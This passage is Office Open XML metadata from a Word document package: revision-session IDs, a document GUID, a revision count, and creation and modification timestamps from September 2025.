    <w:rsid w:val="00962441"/>
    <w:rsid w:val="0098636F"/>
    <w:rsid w:val="009B2778"/>
    <w:rsid w:val="009E0D80"/>
    <w:rsid w:val="00A3269A"/>
    <w:rsid w:val="00B97018"/>
    <w:rsid w:val="00D85D31"/>
    <w:rsid w:val="00E623BA"/>
    <w:rsid w:val="00EC038F"/>
    <w:rsid w:val="00EF4914"/>
    <w:rsid w:val="00F173C2"/>
    <w:rsid w:val="00FD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22D3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2EB0CAC1-4E8C-4804-BCB8-E8F713BA9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52</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-10T18:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-17T04:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>